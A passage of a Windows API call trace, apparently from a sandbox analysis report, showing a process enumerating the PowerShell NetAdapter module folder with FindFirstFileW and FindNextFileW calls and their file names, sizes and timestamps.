nFileSizeHigh=0x0, nFileSizeLow=0x2a18, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRdma.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.041] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c691a7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c691a7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2a70, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRsc.cdxml", cAlternateFileName="")) returned 1 [0265.041] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRsc.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.042] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x27d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRss.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.042] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1808, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRss.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.042] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2701, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriov.cdxml", cAlternateFileName="")) returned 1 [0265.042] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe42, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriov.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.042] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriovVf.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.042] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb565c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10cb565c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb44, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriovVf.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.043] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterStatistics.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.043] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterStatistics.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.043] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2319, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmq.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.043] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb51, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmq.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.043] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmqQueue.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.043] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb565c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10cb565c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe06, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmqQueue.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.043] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9df, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVPort.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.043] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVPort.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.044] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc82, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0265.044] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.psd1", cAlternateFileName="")) returned 1 [0265.044] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb225, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.045] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.045] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0265.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.045] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", lpFilePart=0x0) returned 0x3d [0265.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0265.045] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0265.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0265.046] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0265.046] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", lpFilePart=0x0) returned 0x3d [0265.046] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\", lpFilePart=0x0) returned 0x3e [0265.046] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.046] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.046] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ffb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.046] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapter.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.047] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3925, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterAdvancedProperty.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.047] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e57, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterAdvancedProperty.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.047] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x260e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterBinding.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.047] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterBinding.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.047] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2fb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterChecksumOffload.cdxml", cAlternateFileName="")) returned 1 [0265.048] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterChecksumOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.048] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb565c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10cb565c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2418, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterEncapsulatedPacketTaskOffload.cdxml", cAlternateFileName="")) returned 1 [0265.048] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterEncapsulatedPacketTaskOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.048] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterHardwareInfo.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.048] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterHardwareInfo.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.048] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x245a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterIPsecOffload.cdxml", cAlternateFileName="")) returned 1 [0265.049] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x15fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterIPsecOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.049] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2432, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterLso.cdxml", cAlternateFileName="")) returned 1 [0265.049] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1748, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterLso.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.049] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e61, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPacketDirect.cdxml", cAlternateFileName="")) returned 1 [0265.049] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c25, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPacketDirect.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.049] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4100, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPowerManagement.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.050] FindNextFileW (in: hFindFile=0x1a8dbb60, 